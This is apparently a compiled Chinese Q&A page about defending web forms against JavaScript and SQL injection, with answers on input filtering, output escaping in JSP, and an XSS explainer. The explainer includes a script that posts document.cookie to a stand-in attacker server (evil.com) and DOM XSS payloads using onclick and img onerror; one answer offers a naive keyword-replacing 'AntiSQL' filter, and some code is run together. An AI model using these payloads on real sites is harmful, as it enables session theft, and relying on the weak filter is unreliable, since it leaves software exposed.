js防脚本注入

A. 用js写一个防sql注入的 函数，能起到效果吗

防止sql注入攻击，在数据库方面，针对每一个表的增删改，写存储过程，程序主要靠存储过程操作数据。 在代码中，个别特殊需要数据查询的，如果不能通过存储过程，那就尽量用传参的方式，尽量不要拼接sql。 如果非要拼接，要对拼接字符串进行处理，Tools的如下字符串处理方法可以防止注入攻击： ///  /// 格式化文本（防止SQL注入） ///  ///  ///  public static string AntiSQL(string html) {     Regex regex一 = new Regex(@"<script[\s\S]+", RegexOptions.IgnoreCase);     Regex regex二 = new Regex(@" href *= *[\s\S]*script *:", RegexOptions.IgnoreCase);     Regex regex三 = new Regex(@" on[\s\S]*=", RegexOptions.IgnoreCase);     Regex regex四 = new Regex(@"<iframe[\s\S]+", RegexOptions.IgnoreCase);     Regex regex5 = new Regex(@"<frameset[\s\S]+", RegexOptions.IgnoreCase);     Regex regex一0 = new Regex(@"select", RegexOptions.IgnoreCase);     Regex regex一一 = new Regex(@"update", RegexOptions.IgnoreCase);     Regex regex一二 = new Regex(@"delete", RegexOptions.IgnoreCase);     html = regex一.Replace(html, ""); //过滤标记     html = regex二.Replace(html, ""); //过滤href=javascript: () 属性     html = regex三.Replace(html, " _disibledevent="); //过滤其它控件的on...事件     html = regex四.Replace(html, ""); //过滤iframe     html = regex一0.Replace(html, "s_elect");     html = regex一一.Replace(html, "u_pudate");     html = regex一二.Replace(html, "d_elete");     html = html.Replace("'", "’");     html = html.Replace(" ", " ");     return html;

B. js脚本注入

你说的是 防止xss脚本注入攻击吧。要么选择后端直接过滤掉这种类似的<script>alert()</script>字符串，但是这对客户而言又不太友好。我用的最直接的方法，取得这样的数据在前端显示的时候用

vara="<xmp>"+"<script>alert()</script>"+"</xmp>";

再把a加到你要展示的地方，浏览器就不会识别它成js代码去执行了。

仅做参考，按你的实际情况做选择吧

C. java web如何防止html，js注入

在java Web体系中，可以写自定义标签，过滤用户输入，也可以写一个filter过滤器。比如说自定义标签。

开发步骤:

1 写一个标签处理类

2在/WEB-INF/目录下，写一个*.tld文件，目的是让Web容器知道自定义标签和标签处理类的对应关系

3 在JSP页面中，通过<%@taglib%>指令引用标签库.

4 部署web应用，访问simple.jsp即可

其中，标签处理类可以这样写，转义大于号，小于号等特殊符号。

packagecn.itcast.web.jsp.tag;

importjava.io.IOException;
importjava.io.StringWriter;

importjavax.servlet.jsp.JspException;
importjavax.servlet.jsp.PageContext;
importjavax.servlet.jsp.tagext.JspFragment;
importjavax.servlet.jsp.tagext.SimpleTagSupport;

//<simple:filter>标签处理类
{
	publicvoiddoTag()throwsJspException,IOException{
		JspFragmentjspFragment=this.getJspBody();
		StringWriterwriter=newStringWriter();
		jspFragment.invoke(writer);
		Stringtemp=writer.getBuffer().toString();
		//结果必定是转义后的字符串
		temp=filter(temp);
		PageContextpageContext=(PageContext)this.getJspContext();
		pageContext.getOut().write(temp);
	}
	publicStringfilter(Stringmessage){
if(message==null)
return(null);
charcontent[]=newchar[message.length()];
message.getChars(0,message.length(),content,0);
StringBufferresult=newStringBuffer(content.length+50);
for(inti=0;i<content.length;i++){
switch(content[i]){
case'<':
result.append("&lt;");
break;
case'>':
result.append("&gt;");
break;
case'&':
result.append("&amp;");
break;
case'"':
result.append("&quot;");
break;
default:
result.append(content[i]);
}
}
return(result.toString());
}
}

D. 什么是JavaScript注入及简单的防御方法

很多网站都有私信或者留言板功能。登录用户可以发表评论或者给其他用户(包括管理员)发送私信。一个最简单的模拟表单如下:

<form action="sendmessage.php" method="post'">
<textarea name="message"> </textarea>
<input type="submit" value="send" />
</form>

当用户点击发送时，这条消息会被保存在数据库中指定的数据表中，另一个用户当打开这条消息的时候将看到发送的内容。但是，如果一个恶意攻击者发送的内容包含了一些javascript代码，这些代码用于偷取敏感的cookie信息。当用户打开看到这条消息的时候，恶意的javascript代码就会得到执行，造成敏感cookie信息泄漏。攻击者可以利用获得这些cookie信息进行session hijacking会话劫持，直接以合法用户的身份登录其他用户的账户。
恶意攻击者可以在消息框中加入一下javascript代码:

?
var url = "http://www.evil.com/index.php"; //攻击者控制的服务器
var postStr = "ck=" + document.cookie;
var ajax = null;
if(window.XMLHttpRequest())
{
ajax = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
ajax = new ActiveXObject("Microsoft.XMLHttp");
}
else
{
return;
}
ajax.open("POST", url, true);
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send(postStr);
ajax.onreadystatechange = function()
{
if(ajax.readyState == 4 && ajax.status == 200)
{
//alert("Done!");
}
}

通过AJAX异步请求，将被攻击者的敏感cookie信息发送给了攻击者控制的服务器。攻击者随后即可利用这些cookie信息以”合法”用户的身份进行登录操作。
这里首先要理清楚几个重要的问题:
1. cookie的作用
Cookie，有时也用其复数形式Cookies，指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据（通常经过加密）。定义于RFC2109（已废弃），最新取代的规范是RFC2965。
也就是说，cookie是用户和服务器之间的桥梁。服务器可以使用session来保存用户的身份信息(ID,购物车等)，但是需要用户在访问网页(发送HTTP数据稿野困包)的时候附带上相应的cookie，通过cookie中的特定值来识别sessionID，才能把单独用户和单独的session联系起来。cookie是有状态HTTP交互的一种重要机制。
2. 浏览器的同源策略
在进行cookie窃取的时候，攻击者偷取的cookie是什么，是全部cookie，还是当前这个网站的cookie？要解决这键念个问题，我们要先了解一些浏览器的同源策略。
同源策略，它是由Netscape提出的一个着名的安全策略。
现在所有支持JavaScript 的浏览器都会使用这个策略。
所谓同源是指，域名，协议，端口相同。
当一个浏览器的两个tab页中分别打开来 网络和谷歌的页面
当浏览器的网络tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的，
即检查是否同源，只有和网络同源的脚本才会被执行。
同源策略(Same Origin Policy)是一种约定，它是浏览器最核心也是最基本的安全功能，如果缺少了同源策略，则浏览器的正常功能可能都会受到影响。可以说web是构建在同源策略的基础之上的，浏览器只是针对同源策略的一种实现。
浏览器的同源策略限制了来自不同源的”document”或脚本，对当前”document”的读取或者设置某些属性。为了不让浏览器的页面行为发生混乱，浏览器提出了”Origin”(源)这以概念，来自不同的Origin的对象无法互相干扰。
因为同源策略的原因，也脊磨就导致了我们的XSS Payload(XSS攻击代码)必须在我们希望攻击的同一个域下触发。例如攻击者如果想窃取在www.a.com下的cookie，那就必须在www.a.com这个域(可以是不同页面，但要保证是同一个域)下的的某一个页面放置XSS代码，可以是存储型，也可以是反射型或DOM Baesd型的。
4. XSS攻击的种类
对XSS的分类没有明确的标准，但业界普遍将XSS攻击分为三类。反射型XSS(non-persistent XSS), 存储型XSS(persistent XSS), DOM Based XSS
4.1 非持久性跨站点脚本攻击
非持久性XSS也称为反射型跨站漏洞。它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。如果你看了我们上面所示的例子,第一个例子是一个非持久的XSS攻击。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。
4.2 持久的跨站点脚本攻击
持久型跨站点脚本也称为存储跨站点脚本。它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库，当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。在上面的示例中,第二个例子就展示了一个持久的XSS攻击。持久的XSS相比非持久性XSS攻击危害性更大,因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS。
4.3 基于dom的跨站点脚本攻击
基于DOM的XSS有时也称为type0 XSS。当用户能够通过交互修改浏览器页面中的DOM(Document Object Model)并显示在浏览器上时，就有可能产生这种漏洞，从效果上来说它也是反射型XSS。
通过修改页面的DOM节点形成的XSS，称之为DOM Based XSS。

?

1
2
3
4
5
6
7
8
9
10

<script>
function test()
{
var str = document.getElementById("text").value;
document.getElementById("t").innerHTML = "<a href='" + str + "' >testLink</a>";
}
</script>
<div id="t"></div>
<input type="text" id="text" value="" />
<input type="button" id="s" value="write" onclick="test()" />

在这个场景中，代码修改了页面的DOM节点，通过innerHTML把一段用户数据当作HTML写入到页面中，这就造成了DOM Based XSS
' onclick=alert(/xss/) '
输入后，页面代码就变成了:
<a href='' onclick=alert(/xss/) '' >testLink</a>
点击这个新生成的链接，脚本将被执行。
实际上，这里还有另外一种利用方式—除了构造一个新事件外，还可以选择闭合掉<a>标签，并插入一个新的HTML标签:
'><img src=# onerror=alert(/xss2/) /><'
页面代码变成了:
<a href=''><img src=# onerror=alert(/xss2/) /><'' >testLink</a>
5. XSS漏洞产生的原因
跨站点脚本的主要原因是程序猿对用户的信任。开发人员轻松地认为用户永远不会试图执行什么出格的事情,所以他们创建应用程序,却没有使用任何额外的代码来过滤用户输入以阻止任何恶意活动。另一个原因是,这种攻击有许多变体，用制造出一种行之有效的XSS过滤器是一件比较困难的事情。
但是这只是相对的，对用户输入数据的”编码”和”过滤”在任何时候都是很重要的，我们必须采取一些针对性的手段对其进行防御。

E. 如何防止表单提交过来的恶意JS脚本和SQL注入

1、禁止外部提交数据2、禁止未命名变量使用3、精确获取参数值类型，如有位数限制，再精确位数个数，其它全部输出自己写的错误提示以上3条足以在程序上实现防注入（不能防止服务器或数据库本身注入），具体怎么写是根据具体是哪种语言来写的，可以网络那个语言的这三种方式要怎么写。